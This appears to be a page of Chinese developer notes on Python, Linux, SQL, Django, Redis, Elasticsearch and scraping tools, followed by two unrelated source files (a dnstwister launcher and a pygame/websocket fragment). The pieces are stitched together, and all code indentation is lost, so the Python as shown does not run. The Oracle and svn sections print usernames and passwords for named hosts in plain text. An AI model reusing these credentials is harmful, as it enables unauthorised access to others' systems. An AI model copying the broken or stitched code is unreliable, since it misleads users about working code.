-------------------------------------------------------------------------------------------------------------
# 1、python装饰器,传参
~~~python
def set_level(level_num):
def set_func(func):
def call_func(*args, **kwargs):
if level_num == 1:
print("----权限级别1,验证----")
elif level_num == 2:
print("----权限级别2,验证----")
return func()
return call_func
return set_func
@set_level(1)
def test1():
print("-----test1---")
return "ok test1"
# 计算函数耗时的装饰器
def count_time(func):
def int_time(*args, **kwargs):
start_time = time.time() # 程序开始时间
ret = func(*args, **kwargs)
over_time = time.time() # 程序结束时间
total_time = (over_time - start_time)
print('%s程序共计%.6f秒' % (func, total_time))
return ret
return int_time
~~~
# 2、字典按照值的大小排序
~~~js
json.dumps()--dict->str json.loads()--str->dict
~~~
~~~python
d={'a':24,'g':52,'i':12,'k':33}
sorted(d.items(), key=lambda x:x[1])
$:[('i', 12), ('a', 24), ('k', 33), ('g', 52)]
--------------------------------------------------
# 前十10人气大神倒序排序
manito_score = sorted(result.items(), key=lambda x: float(x[1]), reverse=True)[:10]
---------------------------------------------------
# 排序 ret_json=[{'user_id':461687615,'manito_score':88},{'user_id':461687614,'manito_score':84}]
sorted_x = sorted(ret_json, key=lambda x: x['manito_score'], reverse=True)
# 排序, 根据两个字段的值倒序排序
sorted_x = dict(sorted(feature_result_list[0].items(), key=lambda x: (-(json.loads(x[1]).get('3010013') if json.loads(x[1]).get('3010013') else 0),-(json.loads(x[1]).get('3000015') if json.loads(x[1]).get('3000015') else 0))))
~~~
filter函数:
~~~python
dic = {'k1': 10, 'k2': 100, 'k3': 50, 'k4': 90}
print(list(filter(lambda x: x[1] > 50, dic.items()))) # 把值大于50的由元祖组成的键值对过滤出来。 x[1]代表value
$:[('k2', 100), ('k4', 90)]
---------------------------------------------------------
# 删除字典中值为None的元素
result_dict = dict(filter(lambda x: x[1] != None, ret.items()))
~~~
# 3、python实现冒泡排序、插入排序、快速排序
~~~python
def BubbleSort(numList):
if not len(numList):
return
for i in range(len(numList)):
for j in range(len(numList)-1):
if numList[i] < numList[j]:
numList[i], numList[j] = numList[j], numList[i]
return numList
时间复杂度:O(n) O(n2)
~~~
~~~python
def insert_sort(alist):
# 从第二个位置,即下标为1的元素开始向前插入
for i in range(1, len(alist)):
# 从第i个元素开始向前比较,如果小于前一个元素,交换位置
for j in range(i, 0, -1):
if alist[j] < alist[j-1]:
alist[j], alist[j-1] = alist[j-1], alist[j]
alist = [54,26,93,17,77,31,44,55,20]
insert_sort(alist)
时间复杂度:O(n) O(n2)
~~~
~~~python
def quick_sort(alist, start, end):
"""快速排序"""
# 递归的退出条件
if start >= end:
return
# 设定起始元素为要寻找位置的基准元素
mid = alist[start]
# low为序列左边的由左向右移动的游标
low = start
# high为序列右边的由右向左移动的游标
high = end
while low < high:
# 如果low与high未重合,high指向的元素不比基准元素小,则high向左移动
while low < high and alist[high] >= mid:
high -= 1
# 将high指向的元素放到low的位置上
alist[low] = alist[high]
# 如果low与high未重合,low指向的元素比基准元素小,则low向右移动
while low < high and alist[low] < mid:
low += 1
# 将low指向的元素放到high的位置上
alist[high] = alist[low]
# 退出循环后,low与high重合,此时所指位置为基准元素的正确位置
# 将基准元素放到该位置
alist[low] = mid
# 对基准元素左边的子序列进行快速排序
quick_sort(alist, start, low-1)
# 对基准元素右边的子序列进行快速排序
quick_sort(alist, low+1, end)
alist = [54,26,93,17,77,31,44,55,20]
quick_sort(alist,0,len(alist)-1)
print(alist)
时间复杂度:O(nlogn) O(n2)
~~~
# 4、公网如何与内网通讯?
第一步:在内网服务器上,使用ssh命令建立反向隧道:
`ssh -fNR port:localhost:22 publicUserName@publicIp`
-f 表示后台执行
-N 表示不执行任何命令
-R 建立反向隧道
port 你可以指定任何端口,这个只要没有被占用即可
第二步:登录你自己的服务器,登录进去之后,使用如下命令:
`ssh localhost -p port`
-p 后面跟的port(端口)需要与第一步设置的保持一致
另外 请注意下用户名是否一致
至此,输入完密码之后,就可以远程登录了
# 5、Linux、vim命令
压缩:zip ana.zip anaconda-ks.cfg
解压:upzip fileName.zip
`lsof -i:8000` 用于查看某一端口的占用情况
`netstat -tunlp |grep 8000` 用于查看指定的端口号的进程情况
`du -sh *` 查看当前目录下所有文件大小
```shell
python@ubuntu:~/kkbuluo$ du -sh *
96K 2018电影
240K fangtianxia
256K proxy-pool
188K search_proj
48M unsplash_spider
384K weibo_spider
```
`df -h` 查看磁盘使用量
~~~shell
root@ubuntu:~# df -h
文件系统 容量 已用 可用 已用% 挂载点
udev 1.5G 0 1.5G 0% /dev
tmpfs 300M 8.8M 291M 3% /run
/dev/sda1 21G 13G 6.7G 66% /
tmpfs 1.5G 14M 1.5G 1% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 1.5G 0 1.5G 0% /sys/fs/cgroup
tmpfs 300M 56K 299M 1% /run/user/1000
~~~
`fdisk -l`查看磁盘使用量
~~~shell
root@ubuntu:~/kkbuluo# fdisk -l
Disk /dev/sda: 35 GiB, 37580963840 bytes, 73400320 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x39fde10b
设备 启动 Start 末尾 扇区 Size Id 类型
/dev/sda1 * 2048 64520191 64518144 30.8G 83 Linux
/dev/sda2 64520192 73400319 8880128 4.2G 5 扩展
/dev/sda5 64522240 73400319 8878080 4.2G 82 Linux 交换 / Solaris
~~~
程序后台执行:`nohup python3 money_award.py &` 会在当前文件夹生nohup.out(终端打印数据)
**vim将多个空格换成一个空格** `:%s/ */ /g`
**vim查找字符串** `:/python` N键下一个
**vim多行注释与取消注释**:<https://blog.csdn.net/suixin_123/article/details/81393397>
**多行删除**
* 1.首先在命令模式下,输入“:set nu”显示行号;
* 2.通过行号确定你要删除的行;
* 3.命令输入“:32,65d”,回车键,32-65行就被删除了
如果无意中删除错了,可以使用‘u’键恢复(命令模式下)
**vim提取含有所有关键词的行**:
* :let @a="" --- 使用let命令寄存器a里的内容清空
* :g/book/y A --- 把所有包含book的行都添加到寄存器a中
* :put a --- 把寄存器a里的内容粘贴出来 ,光标所在行
# 6、Oracle数据库
* 查看时间(小时)
~~~sql
select sysdate,to_char(sysdate,'hh24') from dual;
sysdate to_char(sysdate,'HH24')
2019-08-26 10:07:24
~~~
* python操作oracle读取数据dict格式
~~~python
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%Y-%m-%d %A %H:%M:%S',
filename='./info.log',
filemode='a'
)
# 支持中文
os.environ['NLS_LANG'] = 'SIMPLIFIED CHINESE_CHINA.UTF8'
conn = cx_Oracle.connect('dw_user/dw_userrainbow@106.75.248.35:15210/rainbow')
orcl_cursor = self.conn.cursor()
try:
orcl_cursor.execute(sql)
columns = [column[0] for column in self.orcl_cursor.description]
for row in orcl_cursor.fetchall():
result.append(dict(zip(columns, row)))
except Exception as e:
logging.error(e)
finally:
conn.close()
orcl_cursor.close()
~~~
* 查询时间大于某个时间的记录:
~~~sql
select * from WBC_SUBJECT where GMT_CREATE > to_date('2019-04-09 12:00:00','yyyy-mm-dd hh24:mi:ss');
~~~
* 查询一个半小时之间的数据:
~~~python
current_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
old_time =(datetime.datetime.now()+datetime.timedelta(minutes=-90)).strftime("%Y-%m-%d %H:%M:%S")
sql = """select TICKET_NO,ORDER_NO,DRAW_RESULT,MIX_TYPE,MULTIPLE,GMT_CREATE,ISSUE_NO,LOTTERY_TYPE,LOTTERY_SUB_TYPE,GMT_MODIFIED
from LTDR_PRINT_TICKET
where ((gmt_create>=to_date('%s', 'yyyy-mm-dd HH24:mi:ss')
and gmt_create<to_date('%s', 'yyyy-mm-dd HH24:mi:ss'))
or (gmt_modified >= to_date('%s', 'yyyy-mm-dd HH24:mi:ss')
and gmt_modified < to_date('%s', 'yyyy-mm-dd HH24:mi:ss')))
and DRAW_STATUS = 'DRAW_FINISH'
and MIX_TYPE is not null and DRAW_RESULT is not null""" % (old_time, current_time, old_time, current_time)
~~~
* 插入Oracle数据库,查询,增量更新
~~~python
try:
db = cx_Oracle.connect('bd_warehouse/v5gaoo5c2uc1u4ye@192.168.16.16:1521/jczjtest') # 线上
# db = cx_Oracle.connect('bd_warehouse/bd_warehouse@10.0.12.2:1521/dev')
cursor = db.cursor()
in_data=[]
up_data=[]
for item in split_last_list:
item['DRAW_RESULT'] = item['DRAW_RESULT'].replace(', ', '|')
item['GMT_CREATE'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
item['GMT_MODIFIED'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
sql = """select ORDER_NO,ISSUE_NO,DRAW_RESULT,LOTTERY_SUB_TYPE from PRIZE_TICKET_SPLIT where ORDER_NO='%s' and DRAW_RESULT='%s' and GAME_NO='%s' and LOTTERY_SUB_TYPE='%s'""" % (item['ORDER_NO'], item['DRAW_RESULT'], item['GAME_NO'], item['LOTTERY_SUB_TYPE'])
cursor.execute(sql)
ret = cursor.fetchall()
# 判断是否有重复数据
if not ret:
in_data.append((item['ORDER_NO'], item['DRAW_RESULT'], item['MIX_TYPE'], item['MULTIPLE'], item['GMT_CREATE'], item['MATCH_COUNT'], item['UNIQUE_ID'], item['GAME_RESULT_SP'], item['UNIQUE_STATUS'], item['GAME_NO'], item['ISSUE_NO'], item['LOTTERY_TYPE'], item['LOTTERY_SUB_TYPE'], item['GMT_MODIFIED']))
else:
# 有重复数据
up_data.append((item['MULTIPLE'], item['GMT_CREATE'], item['GMT_MODIFIED'], item['ORDER_NO'],item['DRAW_RESULT'], item['GAME_NO'], item['MULTIPLE'], item['LOTTERY_SUB_TYPE']))
sql = """INSERT INTO PRIZE_TICKET_SPLIT (id, ORDER_NO, DRAW_RESULT, MIX_TYPE, MULTIPLE, GMT_CREATE, MATCH_COUNT, UNIQUE_ID, GAME_RESULT_SP, UNIQUE_STATUS, GAME_NO,ISSUE_NO,LOTTERY_TYPE,LOTTERY_SUB_TYPE,GMT_MODIFIED) VALUES (SEQ_PRIZE_TICKET_SPLIT.nextval, :v2, :v3, :v4, :v5,to_date(:v6,'yyyy-mm-dd hh24:mi:ss') ,:v7, :v8, :v9, :v10, :v11, :v12,:v13,:v14,to_date(:v15,'yyyy-mm-dd hh24:mi:ss'))"""
up_sql = """update PRIZE_TICKET_SPLIT set MULTIPLE=:v1,GMT_CREATE=to_date(:v2,'yyyy-mm-dd hh24:mi:ss'), GMT_MODIFIED=to_date(:v3,'yyyy-mm-dd hh24:mi:ss') where ORDER_NO=:v4 and DRAW_RESULT=:v5 and GAME_NO = :v6 and MULTIPLE < :v7 and LOTTERY_SUB_TYPE=:v8"""
if len(up_data)>0:
print('开始更新数据')
cursor.executemany(up_sql, up_data)
db.commit()
print('%d条数据更新Successful' % len(up_data))
logging.info('%d条数据更新Successful' % len(up_data))
if len(in_data) > 0:
print('开始插入数据')
cursor.executemany(sql,in_data)
db.commit()
print('%d条数据插入Successful'%len(in_data))
logging.info('%d条数据插入Successful'%len(in_data))
db.close()
except Exception as e:
logging.error(e)
~~~
# 7、crontab使用
py文件:main.py
~~~python
import datetime
time_now = datetime.datetime.now().strftime("%Y-%m-%d %H-%M-%S")
print("现在的时间是:{}".format(time_now))
~~~
可执行文件:run.sh
~~~shell
cd `dirname $0` || exit 1 # 进入当前Shell程序的目录
python3 ./main.py >> run.log 2>&1 # 将标准错误重定向到标准输出
~~~
编辑定时任务( 如果文件不存在会自动创建):`crontab -e`
~~~python
*/1 * * * * /home/python/Desktop/run.sh # 每分钟执行一次run.sh
~~~
查看定时任务:`crontab -l`
删除定时任务:`crontab -r`
# 8、项目部署
linux批量杀死进程:
* `ps -ef | grep gunicorn | awk '{print $2}'|xargs kill -9`
svn到服务器:
* svn co --username=caoshangfei --password caoshangfei123456 https://huored.gicp.net:8088/svn/bd_anti_spam/trunk/线上搜索项目/search_system_online
* svn co --username=caoshangfei --password caoshangfei123456 https://huored.gicp.net:8088/svn/bd_python_recommend/branches/v2.0.0
* svn co --username=caoshangfei --password caoshangfei123456 https://huored.gicp.net:8088/svn/bd_python_recommend/branches/supplement
* svn co --username=caoshangfei --password caoshangfei123456 https://huored.gicp.net:8088/svn/bd_python_recommend/trunk
* 解决冲突:svn revert --depth=infinity . -----> svn update
* 回到其他版本号:svn up -r 版本号
项目部署流程:
* 进入 root 用户 vim /etc/supervisord.conf
* sudo -i 切换 root 用户 root 用户 切换 hadoop 用户 su - hadoop
**hadoop005启动gunicorn:** `/home/hadoop/.local/bin/gunicorn -b 192.168.17.25:8000 manage:app -c ./gunicorn_conf.py`
**线下推荐启动程序:**`gunicorn -b 10.4.212.3:3000 -w 3 run_app:app --log-level=debug --log-file ./log/gunicorn.log `
**supervisorctl 管理gunicorn 启动:**
~~~javascript
[program:sensitive_word]
command=/opt/anaconda3/bin/gunicorn -b 10.4.212.4:7200 sensitive_word_api:app -c gunicorn_conf.py
directory=/home/admin/anti_spam/sensitive_word_model
startsecs=0
stopwaitsecs=0
autostart=true
autorestart=true
user=admin
environment=HOME=/home/admin
environment=NLS_LANG="Simplified Chinese_CHINA.ZHS16GBK"
stdout_logfile=/home/admin/anti_spam/sensitive_word_model/log/gunicorn.log
stderr_logfile=/home/admin/anti_spam/sensitive_word_model/log/gunicorn.err
~~~
# 9、MySQL去重操作
```mysql
--查询单个字段重复数据
select name from films group by name having count(*)>1;
--查询多个字段的重复数据,并将结果的所有字段信息返回
select * from films where(films.name,films.box_office) in (select name,box_office from films group by name,box_office having count(*)>1);
--删除 table 中重复数据.
# 1.查询出重复记录形成一个集合(临时表t2),集合里是每种重复记录的最小ID。
# 2.关联 判断重复基准的字段。
# 3.根据条件,删除原表中id大于t2中id的记录
delete films form films,(select min(id) id,name,released from films group by name,released having count(*)>1) t2 where films.name = t2.name and films.released = t2.released and films.id>t2.id;
```
乐观锁:`update tb_sku set stock=2 where id=1 and stock=7;`
# 10、Django 获取参数
1. 查询字符串query—string
```python
# /qs/?a=1&b=2&a=3
def qs(request):
a = request.GET.get('a')
b = request.GET.get('b')
alist = request.GET.getlist('a')
print(a) # 1
print(b) # 2
print(alist) # ['1','3']
return HttpResponse("OK")
```
**重要:查询字符串不区分请求方式,即假使客户端进行POST方式的请求,依然可以通过request.GET获取请求中的查询字符串数据。**
2. 表单类型form-data
```python
def get_body(request):
a = request.POST.get('a')
b = request.POST.get('b')
alist = request.POST.getlist('a')
print(a)
print(b)
print(alist)
return HttpResponse('OK')
```
**重要:request.POST只能用来获取POST方式的请求体表单数据。**
3. 非表单类型non-form-data
```python
例如要获取请求体中的如下JSON数据
{"a": 1, "b": 2}
import json
def get_body_json(request):
json_str = request.body
json_str = json_str.decode() # python3.6 无需执行此步
req_data = json.loads(json_str)
print(req_data['a'])
print(req_data['b'])
return HttpResponse('OK')
```
4. 请求头
```python
def get_headers(request):
print(request.COOKIES.get('name'))
print(request.META['CONTENT_TYPE'])
return HttpResponse("OK")
```
5. 常用的HttpRequest对象属性
```python
method、user、path、
```
# 11、Django Rest Framework
`request.data` 返回解析之后的请求体数据。类似于Django中标准的`request.POST`和`request.FILES`
`request.query_params`与Django标准的`request.GET`相同
set_password check_password
# 12、使用redis有什么缺点,怎么解决?redis为什么这么快?
回答:主要是四个问题
(一)缓存和数据库双写一致性问题
- 分析:一致性问题是分布式常见问题,还可以再分为最终一致性和强一致性。数据库和缓存双写,就必然会存在不一致的问题。。答这个问题,先明白一个前提。就是如果对数据有强一致性要求,不能放缓存。我们所做的一切,只能保证最终一致性。另外,我们所做的方案其实从根本上来说,只能说降低不一致发生的概率,无法完全避免。因此,有强一致性要求的数据,不能放缓存。
- 回答:[《分布式之数据库和缓存双写一致性方案解析》](https://www.baidu.com/s?wd=%E3%80%8A%E5%88%86%E5%B8%83%E5%BC%8F%E4%B9%8B%E6%95%B0%E6%8D%AE%E5%BA%93%E5%92%8C%E7%BC%93%E5%AD%98%E5%8F%8C%E5%86%99%E4%B8%80%E8%87%B4%E6%80%A7%E6%96%B9%E6%A1%88%E8%A7%A3%E6%9E%90%E3%80%8B&tn=24004469_oem_dg&rsv_dl=gh_pl_sl_csd)给出了详细的分析,在这里简单的说一说。首先,采取正确更新策略,先更新数据库,再删缓存。其次,因为可能存在删除缓存失败的问题,提供一个补偿措施即可,例如利用消息队列。
(二)缓存雪崩问题
- 分析:缓存雪崩,即缓存同一时间大面积的失效,这个时候又来了一波请求,结果请求都怼到数据库上,从而导致数据库连接异常。
- 回答:1,给缓存的实效时间加上一个随机值,避免集体实效;2,使用互斥锁,但是该方法吞吐量明显下降;3,双缓存,我们有两个缓存,缓存A和缓存B,缓存A的实效时间20分钟,缓存B不设置实效时间,自己做缓存预热处理
(三)缓存击穿问题
- 分析:缓存穿透,即黑客故意去请求缓存中不存在的数据,导致所有的请求都怼到数据库上,从而数据库连接异常。
- 回答:1,利用互斥锁,缓存失效的时候,先去获得锁,得到锁了,再去请求数据库。没得到锁,则休眠一段时间重试;2、采用异步更新;3、提供一个能迅速判断请求是否有效的拦截机制,比如,利用布隆过滤器,内部维护一系列合法有效的key。迅速判断出,请求所携带的Key是否合法有效。如果不合法,则直接返回。
(四)缓存的并发竞争问题
- 回答:如下所示
(1)如果对这个key操作,不要求顺序
这种情况下,准备一个分布式锁,大家去抢锁,抢到锁就做set操作即可,比较简单。
(2)如果对这个key操作,要求顺序
假设有一个key1,系统A需要将key1设置为valueA,系统B需要将key1设置为valueB,系统C需要将key1设置为valueC.
期望按照key1的value值按照 valueA-->valueB-->valueC的顺序变化。这种时候我们在数据写入数据库的时候,需要保存一个时间戳。假设时间戳如下
```
系统A key 1 {valueA 3:00}
系统B key 1 {valueB 3:05}
系统C key 1 {valueC 3:10}
```
那么,假设这会系统B先抢到锁,将key1设置为{valueB 3:05}。接下来系统A抢到锁,发现自己的valueA的时间戳早于缓存中的时间戳,那就不做set操作了。以此类推。
redis为什么这么快?
分析:这个问题其实是对redis内部机制的一个考察。其实根据博主的面试经验,很多人其实都不知道redis是单线程工作模型。所以,这个问题还是应该要复习一下的。
回答:主要是以下三点
(一)纯内存操作
(二)单线程操作,避免了频繁的上下文切换
(三)采用了非阻塞I/O多路复用机制
# 13、在ES批量插入数据超时时自动重试
学习ES基本操作:
~~~python
# 创建index POST http://192.168.191.1:8000/create_index?index=xxx
@app.route('/create_index', methods=['POST'])
def create_index():
index = request.args.get('index')
result = es.indices.create(index=index, ignore=400)
return jsonify(result)
# 删除index DEL http://192.168.191.1:8000/delete_index?index=xxx
@app.route('/delete_index', methods=['DELETE'])
def delete_index():
index = request.args.get('index')
result = es.indices.delete(index=index, ignore=[400, 404])
print(result)
return jsonify(result)
# 创建mapping
@app.route('/create_mapping', methods=['POST'])
def create_mapping():
index = request.args.get('index')
mapping = {
"subject": {
"properties": {
"title": {
"type": "string",
'analyzer': 'ik_max_word',
'search_analyzer': 'ik_max_word',
},
"group": {
"type": "string"
},
"name": {
"type": "keyword",
"index": "not_analyzed"
},
"shortContent": {
"type": "string",
'analyzer': 'ik_max_word',
'search_analyzer': 'ik_max_word'
},
"longContent": {
"type": "string",
'analyzer': 'ik_max_word',
'search_analyzer': 'ik_max_word'
},
'manito_score':{
"type": "integer",
"fields": {
"sort": {
"type": "float",
"index": "not_analyzed"
}
}
}
}
}
}
result = es.indices.put_mapping(index=index, doc_type='subject', body=mapping)
return jsonify(result)
~~~
使用ES批量插入数据:
~~~python
from elasticsearch import Elasticsearch, helpers
# es超时自动重试
# es = Elasticsearch([{'host':'10.7.131.4','port':9200}],timeout=60,max_retries=3,retry_on_timeout=True)
# 连接es集群
es = Elasticsearch(['10.7.131.4', '10.7.131.5', '10.7.131.6'],
sniff_on_connection_fail=True, # 节点无响应时刷新节点
sniff_timeout=180 # 设置超时时间
)
def gendata():
my_word = ['foo','bar','baz']
for word in my_word:
yield {
'_index':'news2',
'_type':'subject',
'title':word
}
helpers.bulk(es, gendata())
~~~
查询ES中所有数据:
~~~python
from elasticsearch import Elasticsearch, helpers
# 连接到es集群
es = Elasticsearch(['10.7.131.4', '10.7.131.5', '10.7.131.6'],
sniff_on_connection_fail=True, # 节点无响应时刷新节点
sniff_timeout=180 # 设置超时时间
)
def search():
es_search_options = set_search_optional()
es_result = get_search_result(es_search_options)
final_result = get_result_list(es_result)
return final_result
def get_result_list(es_result):
final_result = []
for item in es_result:
final_result.append(item['_source'])
return final_result
def get_search_result(es_search_options, scroll='5m', index='user', doc_type='cif_user', timeout="1m"):
es_result = helpers.scan(
client=es,
query=es_search_options,
scroll=scroll,
index=index,
doc_type=doc_type,
timeout=timeout
)
return es_result
def set_search_optional():
# 检索选项
es_search_options = {
"query": {
"match_all": {
}
}
}
return es_search_options
if __name__ == '__main__':
final_results = search()
# print([i.get('loginName') for i in final_results])
print(len(final_results))
~~~
# 14、xpath语法
* xpath定位当前元素的相邻元素/兄弟元素:
~~~
前N位:
preceding-sibling::div[N]
后N位:
following-sibling::div[N]
~~~
* xpath获取内容包含`评论[`并且不包含`原文`的a标签的文本
`.//a[contains(text(),"评论[") and not(contains(text(),"原文"))]/text()`
`//div[@class='xxx']/ul/li[not(@clsas)]/span/a/text()`没有class属性的li标签
`//div[contains(@class,'xxx')]/span[last()]/a/text()`class中包含‘xxx’的div下的最后一个span
`//a[text()='下一页']/@href` 文本等于“下一页”的a标签
# 15、html特效:鼠标移动线条汇聚
~~~html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Examples</title>
<meta name="description" content="">
<meta name="keywords" content="">
<link href="" rel="stylesheet">
</head>
<body>
<script>
!function(){function n(n,e,t){return n.getAttribute(e)||t}function e(n){return document.getElementsByTagName(n)}function t(){var t=e("script"),o=t.length,i=t[o-1];return{l:o,z:n(i,"zIndex",-1),o:n(i,"opacity",.5),c:n(i,"color","0,0,0"),n:n(i,"count",99)}}function o(){a=m.width=window.innerWidth||document.documentElement.clientWidth||document.body.clientWidth,c=m.height=window.innerHeight||document.documentElement.clientHeight||document.body.clientHeight}function i(){r.clearRect(0,0,a,c);var n,e,t,o,m,l;s.forEach(function(i,x){for(i.x+=i.xa,i.y+=i.ya,i.xa*=i.x>a||i.x<0?-1:1,i.ya*=i.y>c||i.y<0?-1:1,r.fillRect(i.x-.5,i.y-.5,1,1),e=x+1;e<u.length;e++)n=u[e],null!==n.x&&null!==n.y&&(o=i.x-n.x,m=i.y-n.y,l=o*o+m*m,l<n.max&&(n===y&&l>=n.max/2&&(i.x-=.03*o,i.y-=.03*m),t=(n.max-l)/n.max,r.beginPath(),r.lineWidth=t/2,r.strokeStyle="rgba("+d.c+","+(t+.2)+")",r.moveTo(i.x,i.y),r.lineTo(n.x,n.y),r.stroke()))}),x(i)}var a,c,u,m=document.createElement("canvas"),d=t(),l="c_n"+d.l,r=m.getContext("2d"),x=window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame||function(n){window.setTimeout(n,1e3/45)},w=Math.random,y={x:null,y:null,max:2e4};m.id=l,m.style.cssText="position:fixed;top:0;left:0;z-index:"+d.z+";opacity:"+d.o,e("body")[0].appendChild(m),o(),window.onresize=o,window.onmousemove=function(n){n=n||window.event,y.x=n.clientX,y.y=n.clientY},window.onmouseout=function(){y.x=null,y.y=null};for(var s=[],f=0;d.n>f;f++){var h=w()*a,g=w()*c,v=2*w()-1,p=2*w()-1;s.push({x:h,y:g,xa:v,ya:p,max:6e3})}u=s.concat([y]),setTimeout(function(){i()},100)}();
</script>
</body>
</html>
~~~
# 16、scrapyd+scrapydweb实现 Scrapyd 集群管理
**scrapyd:**
`step1:pip install scrapyd pip install scrapyd-client`
`step2:修改scrapyd默认配置,使scrapyd可以运行在任意ip。`
`~/.virtualenvs/spider/lib/python3.5/site-packages/scrapyd$ vim default_scrapyd.conf bind_address = 0.0.0.0`
`step3: 修改scrapy.cfg文件`
~~~python
[settings]
default = sina.settings
[deploy:sina_spider]
url = http://192.168.191.137:6800/
project = sina
~~~
`进入爬虫项目目录,使用命令:scrapyd-deploy sina_spider -p sina 上传爬虫代码`
`step4:查看爬虫状态:curl http://192.168.191.137:6800/daemonstatus.json`
`step5:运行爬虫:curl http://192.168.191.137:6800/schedule.json -d project=sina -d spider=weibo_spider`
**scrapydweb:**
`pip install scrapydweb`
`运行:scrapydweb`
`会自动生成一个scrapydweb_settings.py 文件,修改SCRAPYDWEB_HOST=0.0.0.0`
# 17、读取redis数据库bytes转dict
~~~python
def convert(data):
if isinstance(data, bytes):
return data.decode('ascii')
if isinstance(data, dict):
return dict(map(convert, data.items()))
if isinstance(data, tuple):
return map(convert, data)
return data
~~~
# 18、一行代码
* 一行代码打印99乘法表
~~~python
print('\n'.join([' '.join(['%s*%s=%-2s' % (y, x, x*y) for y in range(1, x+1)]) for x in range(1, 10)]))
~~~
* 一行代码输出菲波那切数列
~~~python
print([x[0] for x in [(a[i][0], a.append([a[i][1], a[i][0]+a[i][1]])) for a in ([[1, 1]], ) for i in range(30)]])
~~~
# 19、神器
截图:Snipaste
看图:Picasa3
工具:FastStone Capture
# 20、断电下载
* 在以前版本的 HTTP 协议是不支持断点的,HTTP/1.1 开始就支持了。一般断点下载时会用到 header请求头的Range字段,这也是现在众多号称多线程下载工具(如 FlashGet、迅雷等)实现多线程下载的核心所在。
* range是请求资源的部分内容(不包括响应头的大小),单位是byte,即字节,从0开始.
如果服务器能够正常响应的话,服务器会返回 206 Partial Content 的状态码及说明.
如果不能处理这种Range的话,就会返回整个资源以及响应状态码为 200 OK .(这个要注意,要分段下载时,要先判断这个)
~~~python
import requests
from tqdm import tqdm
import os
def download_from_url(url, dst):
response = requests.get(url, stream=True) # 设置stream=True参数读取大文件
print(response.status_code)
file_size = int(response.headers['content-length']) # 通过header的content-length属性可以获取文件的总容量。
if os.path.exists(dst):
first_byte = os.path.getsize(dst) # 获取本地已经下载的部分文件的容量,方便继续下载,当然需要判断文件是否存在,如果不存在就从头开始下载
else:
first_byte = 0
if first_byte >= file_size: # 本地已下载文件的总容量和网络文件的实际容量进行比较
return file_size
header = {"Range": f"bytes={first_byte}-{file_size}"}
pbar = tqdm(
total=file_size, initial=first_byte,
unit='B', unit_scale=True, desc=dst)
req = requests.get(url, headers=header, stream=True) # 开始请求视频文件了
with(open(dst, 'ab')) as f:
for chunk in req.iter_content(chunk_size=1024): #循环读取每次读取一个1024个字节
if chunk:
f.write(chunk)
pbar.update(1024)
pbar.close()
return file_size
if __name__ == '__main__':
url = "https://f.us.sinaimg.cn/003JuhEelx07v8gjXeXS01041200FozD0E010.mp4?label=mp4_720p&template=1280x720.23.0&Expires=1562142855&ssig=B%2BC3%2BWo%2Bh%2F&KID=unistore,video"
download_from_url(url, "1.mp4")
~~~
断电下载优化,使用aiohttp进行并发下载
~~~python
import aiohttp
import asyncio
import os
from tqdm import tqdm
async def fetch(session, url, dst, pbar=None, headers=None):
if headers:
async with session.get(url, headers=headers) as req:
with(open(dst, 'ab')) as f:
while True:
chunk = await req.content.read(1024)
if not chunk:
break
f.write(chunk)
pbar.update(1024)
pbar.close()
else:
async with session.get(url) as req:
return req
async def async_download_from_url(url, dst):
'''异步'''
async with aiohttp.connector.TCPConnector(limit=300, force_close=True, enable_cleanup_closed=True) as tc:
async with aiohttp.ClientSession(connector=tc) as session:
req = await fetch(session, url, dst)
file_size = int(req.headers['content-length'])
print(f"获取视频总长度:{file_size}")
if os.path.exists(dst):
first_byte = os.path.getsize(dst)
else:
first_byte = 0
if first_byte >= file_size:
return file_size
header = {"Range": f"bytes={first_byte}-{file_size}"}
pbar = tqdm(
total=file_size, initial=first_byte,
unit='B', unit_scale=True, desc=dst)
await fetch(session, url, dst, pbar=pbar, headers=header)
url = "https://f.us.sinaimg.cn/003JuhEelx07v8gjXeXS01041200FozD0E010.mp4?label=mp4_720p&template=1280x720.23.0&Expires=1562142855&ssig=B%2BC3%2BWo%2Bh%2F&KID=unistore,video"
task = [asyncio.ensure_future(async_download_from_url(url, f"{i}.mp4")) for i in range(1, 12)]
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.wait(task))
loop.close()
~~~
# 21、Excel数据分析
**excel间隔行取数据方法:**
=OFFSET($A$1,N*(ROW(A1)-1),,) ---只要改变N值,就能实现间隔N行提取数据。
|
local_server.py
|
"""Launch."""
import threading
import waitress
import werkzeug.serving
import build.build_fed as build_fed
@werkzeug.serving.run_with_reloader
def serve():
"""Run waitress, but reload with file system changes."""
def builder_thread():
build_fed.build('dnstwister/static/')
build_fed.monitor('dnstwister/static/')
threading.Thread(target=builder_thread).start()
import dnstwister
# Allow for template changes without manual restart.
# At least until https://github.com/pallets/flask/pull/1910 is merged...
dnstwister.app.jinja_env.auto_reload = True
waitress.serve(
dnstwister.app,
host='127.0.0.1',
port=5000,
)
|
main.py
|
import json
from threading import Thread
import pygame
import websocket
import time
from math import floor
from init_state import InitState
from utils import COLORS, get_sprite_surface
console_size = console_width, console_height = 320, 240
console_size_final = console_width * 4, console_height * 4
pixel_size = width, height = 160, 144
screen_size = (width * 4, height * 4)
ARROW = [
[0, 0, 0, 3, 0, 0, 0],
[0, 0, 3, 3, 3, 0, 0],
[0, 3, 3, 3, 3, 3, 0],
[3, 3, 3, 3, 3, 3, 3],
[0, 0, 3, 3, 3, 0, 0],
[0, 0, 3, 3, 3, 0, 0],
[0, 0, 3, 3, 3, 0, 0],
]
values = {
"up": 20,
"down": 10,
"left": 0,
"right": 50,
"connected": 100,
"selected": "up"
}
def on_message(ws, message):
global values
values = json.loads(message)
def on_close(ws):
print("### closed ###")
websocket.enableTrace(True)
